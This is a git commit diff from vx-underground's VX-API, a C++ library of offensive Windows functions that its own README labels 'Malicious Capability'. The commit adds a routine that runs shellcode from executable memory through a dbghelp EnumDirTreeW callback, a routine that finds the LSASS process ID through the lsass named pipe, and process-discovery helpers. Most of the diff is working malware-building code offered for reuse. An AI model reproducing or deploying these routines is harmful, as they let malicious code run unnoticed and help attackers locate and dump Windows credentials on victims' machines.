Mirrors
/
vxug-VXAPI
mirror of https://github.com/vxunderground/VX-API
6
0
Fork 0
Code Issues Projects Releases Wiki Activity

new malcode + fixes

This commit is contained in:
vxunderground 2022-10-25 21:28:31 -05:00
parent 8138d0abe1
commit 24f69a35ba
12 changed files with 359 additions and 104 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
README.md
View File

@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
# VX-API
Version: 2.0.252
Version: 2.0.266
Developer: smelly__vx
@ -131,6 +131,7 @@ You're free to use this in any manner you please. You do not need to use this en
| UacBypassFodHelperMethod | winscripting.blog | Malicious Capability |
| MpfGetLsaPidFromServiceManager | modexp | Malicious Capability |
| MpfGetLsaPidFromRegistry | modexp | Malicious Capability |
| MpfGetLsaPidFromNamedPipe | modexp | Malicious Capability |
| ShellcodeExecViaCertEnumSystemStore | alfarom256 and aahmad097| Malicious Capability |
| ShellcodeExecViaCDefFolderMenu_Create2 | alfarom256 and aahmad097| Malicious Capability |
| ShellcodeExecViaCertEnumSystemStoreLocation | alfarom256 and aahmad097| Malicious Capability |
@ -139,6 +140,7 @@ You're free to use this in any manner you please. You do not need to use this en
| ShellcodeExecViaEnumDateFormatsW | alfarom256 and aahmad097| Malicious Capability |
| ShellcodeExecViaEnumDesktopsW | alfarom256 and aahmad097| Malicious Capability |
| ShellcodeExecViaEnumDesktopWindows | alfarom256 and aahmad097| Malicious Capability |
| ShellcodeExecViaEnumDirTreeW | alfarom256 and aahmad097| Malicious Capability |
# Todo list

12
VX-API/FunctionDeclaration.h
View File

@ -19,6 +19,7 @@ typedef NTSTATUS(NTAPI* NTQUERYINFORMATIONFILE)(HANDLE, PIO_STATUS_BLOCK, PVOID,
typedef NTSTATUS(NTAPI* NTOPENFILE)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PIO_STATUS_BLOCK, ULONG, ULONG);
typedef BOOL(NTAPI* RTLDOSPATHNAMETONTPATHNAME_U)(PCWSTR, PUNICODE_STRING, PCWSTR*, PRTL_RELATIVE_NAME_U);
typedef NTSTATUS(NTAPI* NTCREATEFILE)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PIO_STATUS_BLOCK, PLARGE_INTEGER, ULONG, ULONG, ULONG, ULONG, PVOID, ULONG);
typedef NTSTATUS(NTAPI* NTFSCONTROLFILE)(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);
@ -95,4 +96,13 @@ typedef BOOL(WINAPI* CERTENUMSYSTEMSTORE)(DWORD, PVOID, PVOID, PFN_CERT_ENUM_SYS
typedef BOOL(WINAPI* CERTENUMSYSTEMSTORELOCATION)(DWORD, PVOID, PFN_CERT_ENUM_SYSTEM_STORE_LOCATION);
typedef HCERTSTORE(WINAPI* CERTOPENSTORE)(LPCSTR, DWORD, HCRYPTPROV_LEGACY, DWORD, PVOID);
typedef PCCERT_CHAIN_CONTEXT(WINAPI* CERTFINDCHAININSTORE)(HCERTSTORE, DWORD, DWORD, DWORD, PVOID, PCCERT_CHAIN_CONTEXT);
typedef BOOL(WINAPI* CERTCLOSESTORE)(HCERTSTORE, DWORD);
typedef BOOL(WINAPI* CERTCLOSESTORE)(HCERTSTORE, DWORD);
/*******************************************
DBGHELP IMPORT
*******************************************/
typedef BOOL(WINAPI* SYMINITIALIZEW)(HANDLE, PCWSTR, BOOL);
typedef BOOL(WINAPI* SYMCLEANUP)(HANDLE);
typedef BOOL(WINAPI* ENUMDIRTREEW)(HANDLE, PCWSTR, PCWSTR, PWSTR, LPVOID, PVOID);

0
VX-API/GetPidFromPidBruteForcingW.cpp → VX-API/GetPidFromPidBruteForcing.cpp
View File

194
VX-API/GetPidFromPidBruteForcingEx.cpp Normal file
View File

@ -0,0 +1,194 @@
#include "Win32Helper.h"
DWORD GetPidFromPidBruteForcingExW(_In_ PWCHAR ProcessNameWithExtension)
{
UNICODE_STRING NtfsRoot = { 0 };
IO_STATUS_BLOCK IoBlock = { 0 };
HANDLE hDevice = NULL;
OBJECT_ATTRIBUTES Attributes = { 0 };
HMODULE hModule = NULL, hShlwapi = NULL;
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
NTSTATUS Status = STATUS_SUCCESS;
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
NTCREATEFILE NtCreateFile = NULL;
NTCLOSE NtClose = NULL;
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
PATHSTRIPPATHW PathStripPathW = NULL;
hModule = GetModuleHandleEx2W(L"ntdll.dll");
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
if (!hModule || !hShlwapi)
return 0;
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
return 0;
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
InitializeObjectAttributes(&Attributes, &NtfsRoot, OBJ_CASE_INSENSITIVE, NULL, NULL);
Status = NtCreateFile(&hDevice, GENERIC_READ | SYNCHRONIZE, &Attributes, &IoBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, 0, NULL, 0);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
ProcessIdArray = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwProcessInformationListArrayLength);
if (ProcessIdArray == NULL)
goto EXIT_ROUTINE;
ZeroMemory(&IoBlock, sizeof(IO_STATUS_BLOCK));
Status = NtQueryInformationFile(hDevice, &IoBlock, ProcessIdArray, dwProcessInformationListArrayLength, FileProcessIdsUsingFileInformation);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
for (DWORD dwX = 0; dwX < ProcessIdArray->NumberOfProcessIdsInList; dwX++)
{
WCHAR ImageName[MAX_PATH * sizeof(WCHAR)] = { 0 };
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
if (ProcessId != ERROR_SUCCESS)
break;
#pragma warning( push )
#pragma warning( disable : 4244)
SystemProcessInformation.ProcessId = LongToHandle(ProcessIdArray->ProcessIdList[dwX]);
#pragma warning( pop )
SystemProcessInformation.ImageName.Buffer = ImageName;
SystemProcessInformation.ImageName.Length = 0;
SystemProcessInformation.ImageName.MaximumLength = sizeof(ImageName);
Status = NtQuerySystemInformation(SystemProcessIdInformation, &SystemProcessInformation, sizeof(SystemProcessInformation), NULL);
if (!NT_SUCCESS(Status))
continue;
if (SystemProcessInformation.ImageName.Buffer == NULL)
continue;
PathStripPathW(SystemProcessInformation.ImageName.Buffer);
#pragma warning( push )
#pragma warning( disable : 4244)
if (StringCompareW(ProcessNameWithExtension, SystemProcessInformation.ImageName.Buffer) == ERROR_SUCCESS)
ProcessId = ProcessIdArray->ProcessIdList[dwX];
#pragma warning( pop )
}
EXIT_ROUTINE:
if (ProcessIdArray)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, ProcessIdArray);
if (hDevice)
NtClose(hDevice);
if (hShlwapi)
FreeLibrary(hShlwapi);
return ProcessId;
}
DWORD GetPidFromPidBruteForcingExA(_In_ PCHAR ProcessNameWithExtension)
{
UNICODE_STRING NtfsRoot = { 0 };
IO_STATUS_BLOCK IoBlock = { 0 };
HANDLE hDevice = NULL;
OBJECT_ATTRIBUTES Attributes = { 0 };
HMODULE hModule = NULL, hShlwapi = NULL;
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
NTSTATUS Status = STATUS_SUCCESS;
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
WCHAR ProcessParameterTransformed[MAX_PATH * sizeof(WCHAR)] = { 0 };
NTCREATEFILE NtCreateFile = NULL;
NTCLOSE NtClose = NULL;
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
PATHSTRIPPATHW PathStripPathW = NULL;
if (CharStringToWCharString(ProcessParameterTransformed, ProcessNameWithExtension, StringLengthA(ProcessNameWithExtension) == 0))
goto EXIT_ROUTINE;
hModule = GetModuleHandleEx2W(L"ntdll.dll");
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
if (!hModule || !hShlwapi)
return 0;
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
return 0;
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
InitializeObjectAttributes(&Attributes, &NtfsRoot, OBJ_CASE_INSENSITIVE, NULL, NULL);
Status = NtCreateFile(&hDevice, GENERIC_READ | SYNCHRONIZE, &Attributes, &IoBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, 0, NULL, 0);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
ProcessIdArray = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwProcessInformationListArrayLength);
if (ProcessIdArray == NULL)
goto EXIT_ROUTINE;
ZeroMemory(&IoBlock, sizeof(IO_STATUS_BLOCK));
Status = NtQueryInformationFile(hDevice, &IoBlock, ProcessIdArray, dwProcessInformationListArrayLength, FileProcessIdsUsingFileInformation);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
for (DWORD dwX = 0; dwX < ProcessIdArray->NumberOfProcessIdsInList; dwX++)
{
WCHAR ImageName[MAX_PATH * sizeof(WCHAR)] = { 0 };
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
if (ProcessId != ERROR_SUCCESS)
break;
#pragma warning( push )
#pragma warning( disable : 4244)
SystemProcessInformation.ProcessId = LongToHandle(ProcessIdArray->ProcessIdList[dwX]);
#pragma warning( pop )
SystemProcessInformation.ImageName.Buffer = ImageName;
SystemProcessInformation.ImageName.Length = 0;
SystemProcessInformation.ImageName.MaximumLength = sizeof(ImageName);
Status = NtQuerySystemInformation(SystemProcessIdInformation, &SystemProcessInformation, sizeof(SystemProcessInformation), NULL);
if (!NT_SUCCESS(Status))
continue;
if (SystemProcessInformation.ImageName.Buffer == NULL)
continue;
PathStripPathW(SystemProcessInformation.ImageName.Buffer);
#pragma warning( push )
#pragma warning( disable : 4244)
if (StringCompareW(ProcessParameterTransformed, SystemProcessInformation.ImageName.Buffer) == ERROR_SUCCESS)
ProcessId = ProcessIdArray->ProcessIdList[dwX];
#pragma warning( pop )
}
EXIT_ROUTINE:
if (ProcessIdArray)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, ProcessIdArray);
if (hDevice)
NtClose(hDevice);
if (hShlwapi)
FreeLibrary(hShlwapi);
return ProcessId;
}

96
VX-API/GetPidFromPidBruteForcingExW.cpp
View File

@ -1,96 +0,0 @@
#include "Win32Helper.h"
DWORD GetPidFromPidBruteForcingExW(_In_ PWCHAR ProcessNameWithExtension)
{
UNICODE_STRING NtfsRoot = { 0 };
IO_STATUS_BLOCK IoBlock = { 0 };
HANDLE hDevice = NULL;
OBJECT_ATTRIBUTES Attributes = { 0 };
HMODULE hModule = NULL, hShlwapi = NULL;
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
NTSTATUS Status = STATUS_SUCCESS;
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
NTCREATEFILE NtCreateFile = NULL;
NTCLOSE NtClose = NULL;
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
PATHSTRIPPATHW PathStripPathW = NULL;
hModule = GetModuleHandleEx2W(L"ntdll.dll");
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
if (!hModule || !hShlwapi)
return 0;
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
return 0;
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
InitializeObjectAttributes(&Attributes, &NtfsRoot, OBJ_CASE_INSENSITIVE, NULL, NULL);
Status = NtCreateFile(&hDevice, GENERIC_READ | SYNCHRONIZE, &Attributes, &IoBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, 0, NULL, 0);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
ProcessIdArray = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwProcessInformationListArrayLength);
if (ProcessIdArray == NULL)
goto EXIT_ROUTINE;
ZeroMemory(&IoBlock, sizeof(IO_STATUS_BLOCK));
Status = NtQueryInformationFile(hDevice, &IoBlock, ProcessIdArray, dwProcessInformationListArrayLength, FileProcessIdsUsingFileInformation);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
for (DWORD dwX = 0; dwX < ProcessIdArray->NumberOfProcessIdsInList; dwX++)
{
WCHAR ImageName[MAX_PATH * sizeof(WCHAR)] = { 0 };
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
if (ProcessId != ERROR_SUCCESS)
break;
#pragma warning( push )
#pragma warning( disable : 4244)
SystemProcessInformation.ProcessId = LongToHandle(ProcessIdArray->ProcessIdList[dwX]);
#pragma warning( pop )
SystemProcessInformation.ImageName.Buffer = ImageName;
SystemProcessInformation.ImageName.Length = 0;
SystemProcessInformation.ImageName.MaximumLength = sizeof(ImageName);
Status = NtQuerySystemInformation(SystemProcessIdInformation, &SystemProcessInformation, sizeof(SystemProcessInformation), NULL);
if (!NT_SUCCESS(Status))
continue;
if (SystemProcessInformation.ImageName.Buffer == NULL)
continue;
PathStripPathW(SystemProcessInformation.ImageName.Buffer);
#pragma warning( push )
#pragma warning( disable : 4244)
if (StringCompareW(ProcessNameWithExtension, SystemProcessInformation.ImageName.Buffer) == ERROR_SUCCESS)
ProcessId = ProcessIdArray->ProcessIdList[dwX];
#pragma warning( pop )
}
EXIT_ROUTINE:
if (ProcessIdArray)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, ProcessIdArray);
if (hDevice)
NtClose(hDevice);
if (hShlwapi)
FreeLibrary(hShlwapi);
return ProcessId;
}

32
VX-API/Internal.h
View File

@ -31,6 +31,34 @@
#define FILE_OVERWRITE_IF 0x00000005
#define FILE_MAXIMUM_DISPOSITION 0x00000005
#define FSCTL_PIPE_ASSIGN_EVENT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 0, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_DISCONNECT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 1, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_LISTEN CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_PEEK CTL_CODE(FILE_DEVICE_NAMED_PIPE, 3, METHOD_BUFFERED, FILE_READ_DATA)
#define FSCTL_PIPE_QUERY_EVENT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 4, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_TRANSCEIVE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 5, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define FSCTL_PIPE_WAIT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 6, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_IMPERSONATE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 7, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_SET_CLIENT_PROCESS CTL_CODE(FILE_DEVICE_NAMED_PIPE, 8, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_QUERY_CLIENT_PROCESS CTL_CODE(FILE_DEVICE_NAMED_PIPE, 9, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_GET_PIPE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 10, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_SET_PIPE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 11, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_GET_CONNECTION_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 12, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_SET_CONNECTION_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 13, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_GET_HANDLE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 14, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_SET_HANDLE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 15, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define FSCTL_PIPE_FLUSH CTL_CODE(FILE_DEVICE_NAMED_PIPE, 16, METHOD_BUFFERED, FILE_WRITE_DATA)
#define FSCTL_PIPE_INTERNAL_READ CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2045, METHOD_BUFFERED, FILE_READ_DATA)
#define FSCTL_PIPE_INTERNAL_WRITE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2046, METHOD_BUFFERED, FILE_WRITE_DATA)
#define FSCTL_PIPE_INTERNAL_TRANSCEIVE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2047, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define FSCTL_PIPE_INTERNAL_READ_OVFLOW CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2048, METHOD_BUFFERED, FILE_READ_DATA)
// Flags for query event
#define FILE_PIPE_READ_DATA 0x00000000
#define FILE_PIPE_WRITE_SPACE 0x00000001
typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
@ -1097,4 +1125,6 @@ typedef struct _RTL_RELATIVE_NAME_U{
typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION{
ULONG NumberOfProcessIdsInList;
ULONG_PTR ProcessIdList[1];
} FILE_PROCESS_IDS_USING_FILE_INFORMATION, * PFILE_PROCESS_IDS_USING_FILE_INFORMATION;
} FILE_PROCESS_IDS_USING_FILE_INFORMATION, * PFILE_PROCESS_IDS_USING_FILE_INFORMATION;
typedef VOID(NTAPI* PIO_APC_ROUTINE)(PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG Reserved);

4
VX-API/Main.cpp
View File

@ -47,7 +47,9 @@ int main(VOID)
Sei.Payload = GlobalOpenCalcPayload;
Sei.dwLengthOfPayloadInBytes = 277;
ShellcodeExecViaEnumDesktopsW(&Sei);
//ShellcodeExecViaEnumDirTreeW(&Sei);
dwError = MpfGetLsaPidFromNamedPipe();
return dwError;
}

47
VX-API/MpfGetLsaPidFromNamedPipe.cpp Normal file
View File

@ -0,0 +1,47 @@
#include "Win32Helper.h"
DWORD MpfGetLsaPidFromNamedPipe(VOID)
{
UNICODE_STRING Pipe = { 0 };
NTOPENFILE NtOpenFile = NULL;
NTFSCONTROLFILE NtfsControlFile = NULL;
NTCLOSE NtClose = NULL;
HMODULE hModule = NULL;
IO_STATUS_BLOCK IoBlock = { 0 };
OBJECT_ATTRIBUTES Attributes = { 0 };
DWORD ProcessId = ERROR_SUCCESS;
HANDLE hHandle = INVALID_HANDLE_VALUE;
NTSTATUS Status = STATUS_SUCCESS;
LPSTR InputBuffer = (LPSTR)"ServerProcessId";
hModule = TryLoadDllMultiMethodW((PWCHAR)L"ntdll.dll");
if (hModule == NULL)
return -1;
NtOpenFile = (NTOPENFILE)GetProcAddressA((DWORD64)hModule, "NtOpenFile");
NtfsControlFile = (NTFSCONTROLFILE)GetProcAddressA((DWORD64)hModule, "NtFsControlFile");
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
if (!NtOpenFile || !NtfsControlFile || !NtClose)
return -1;
RtlInitUnicodeString(&Pipe, L"\\Device\\NamedPipe\\lsass");
InitializeObjectAttributes(&Attributes, &Pipe, OBJ_CASE_INSENSITIVE, 0, NULL);
Status = NtOpenFile(&hHandle, FILE_READ_ATTRIBUTES, &Attributes, &IoBlock, FILE_SHARE_READ, NULL);
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
Status = NtfsControlFile(hHandle, NULL, NULL, NULL, &IoBlock, FSCTL_PIPE_GET_PIPE_ATTRIBUTE, InputBuffer, (ULONG)StringLengthA(InputBuffer) + 1, &ProcessId, sizeof(DWORD));
if (!NT_SUCCESS(Status))
goto EXIT_ROUTINE;
EXIT_ROUTINE:
if (hHandle)
NtClose(hHandle);
return ProcessId;
}

55
VX-API/ShellcodeExecViaEnumDirTreeW.cpp Normal file
View File

@ -0,0 +1,55 @@
#include "Win32Helper.h"
DWORD UnusedSubroutineDisposeableThreadEnumDirTreeW(LPVOID Param)
{
PSHELLCODE_EXECUTION_INFORMATION Sei = (PSHELLCODE_EXECUTION_INFORMATION)Param;
SYMINITIALIZEW SymInitialize = NULL;
SYMCLEANUP SymCleanup = NULL;
ENUMDIRTREEW EnumDirTree = NULL;
LPVOID BinAddress = NULL;
BOOL bFlag = FALSE;
HMODULE hModule = NULL;
WCHAR DisposeableBuffer[512] = { 0 };
hModule = TryLoadDllMultiMethodW((PWCHAR)L"dbghelp.dll");
if (hModule == NULL)
goto EXIT_ROUTINE;
SymInitialize = (SYMINITIALIZEW)GetProcAddressA((DWORD64)hModule, "SymInitializeW");
SymCleanup = (SYMCLEANUP)GetProcAddressA((DWORD64)hModule, "SymCleanup");
EnumDirTree = (ENUMDIRTREEW)GetProcAddressA((DWORD64)hModule, "EnumDirTreeW");
if (!SymInitialize || !SymCleanup || !EnumDirTree)
goto EXIT_ROUTINE;
if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
goto EXIT_ROUTINE;
BinAddress = VirtualAlloc(NULL, Sei->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
goto EXIT_ROUTINE;
CopyMemoryEx(BinAddress, Sei->Payload, Sei->dwLengthOfPayloadInBytes);
EnumDirTree(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, BinAddress, NULL);
SymCleanup(InlineGetCurrentProcess);
bFlag = TRUE;
EXIT_ROUTINE:
if (hModule)
FreeLibrary(hModule);
if (BinAddress)
VirtualFree(BinAddress, 0, MEM_RELEASE);
return (bFlag ? 0 : 0xffffffff);
}
BOOL ShellcodeExecViaEnumDirTreeW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei)
{
return CreateThreadAndWaitForCompletion(UnusedSubroutineDisposeableThreadEnumDirTreeW, Sei, INFINITE);
}

6
VX-API/VX-API.vcxproj
View File

@ -170,8 +170,8 @@
<ClCompile Include="GetPidFromEnumProcesses.cpp" />
<ClCompile Include="GetPidFromNtQueryFileInformation.cpp" />
<ClCompile Include="GetPidFromNtQuerySystemInformation.cpp" />
<ClCompile Include="GetPidFromPidBruteForcingExW.cpp" />
<ClCompile Include="GetPidFromPidBruteForcingW.cpp" />
<ClCompile Include="GetPidFromPidBruteForcingEx.cpp" />
<ClCompile Include="GetPidFromPidBruteForcing.cpp" />
<ClCompile Include="GetPidFromWindowsTerminalService.cpp" />
<ClCompile Include="GetPidFromWmiComInterface.cpp" />
<ClCompile Include="GetProcAddress.cpp" />
@ -209,6 +209,7 @@
<ClCompile Include="MasqueradePebAsExplorer.cpp" />
<ClCompile Include="MpfComModifyShortcutTarget.cpp" />
<ClCompile Include="MpfComVssDeleteShadowVolumeBackups.cpp" />
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
<ClCompile Include="OleGetClipboardData.cpp" />
@ -230,6 +231,7 @@
<ClCompile Include="ShellcodeExecViaEnumDateFormatsW.cpp" />
<ClCompile Include="ShellcodeExecViaEnumDesktopsW.cpp" />
<ClCompile Include="ShellcodeExecViaEnumDesktopWindows.cpp" />
<ClCompile Include="ShellcodeExecViaEnumDirTreeW.cpp" />
<ClCompile Include="StringCompare.cpp" />
<ClCompile Include="StringConcat.cpp" />
<ClCompile Include="StringCopy.cpp" />

10
VX-API/VX-API.vcxproj.filters
View File

@ -369,7 +369,7 @@
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
</ClCompile>
<ClCompile Include="GetPidFromPidBruteForcingW.cpp">
<ClCompile Include="GetPidFromPidBruteForcing.cpp">
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
</ClCompile>
<ClCompile Include="TryLoadDllMultiMethod.cpp">
@ -381,7 +381,7 @@
<ClCompile Include="GetPidFromNtQueryFileInformation.cpp">
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
</ClCompile>
<ClCompile Include="GetPidFromPidBruteForcingExW.cpp">
<ClCompile Include="GetPidFromPidBruteForcingEx.cpp">
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
</ClCompile>
<ClCompile Include="ShellcodeExecViaCertEnumSystemStore.cpp">
@ -411,6 +411,12 @@
<ClCompile Include="ShellcodeExecViaEnumDesktopsW.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution from Callback</Filter>
</ClCompile>
<ClCompile Include="ShellcodeExecViaEnumDirTreeW.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution from Callback</Filter>
</ClCompile>
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Internal.h">

3
VX-API/Win32Helper.h
View File

@ -148,6 +148,7 @@ DWORD GetPidFromPidBruteForcingA(_In_ PCHAR ProcessNameWithExtension);
DWORD GetPidFromNtQueryFileInformationW(_In_ PWCHAR FullBinaryPath);
DWORD GetPidFromNtQueryFileInformationA(_In_ PCHAR FullBinaryPath);
DWORD GetPidFromPidBruteForcingExW(_In_ PWCHAR ProcessNameWithExtension);
DWORD GetPidFromPidBruteForcingExA(_In_ PCHAR ProcessNameWithExtension);
//malicious capabilities
DWORD OleGetClipboardDataA(_Inout_ PCHAR Buffer);
@ -167,6 +168,8 @@ BOOL ShellcodeExecViaEnumChildWindows(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei)
BOOL ShellcodeExecViaEnumDateFormatsW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
BOOL ShellcodeExecViaEnumDesktopWindows(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
BOOL ShellcodeExecViaEnumDesktopsW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
BOOL ShellcodeExecViaEnumDirTreeW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
DWORD MpfGetLsaPidFromNamedPipe(VOID);
//evasion
BOOL CreateProcessWithCfGuardW(_Inout_ PPROCESS_INFORMATION Pi, _In_ PWCHAR Path);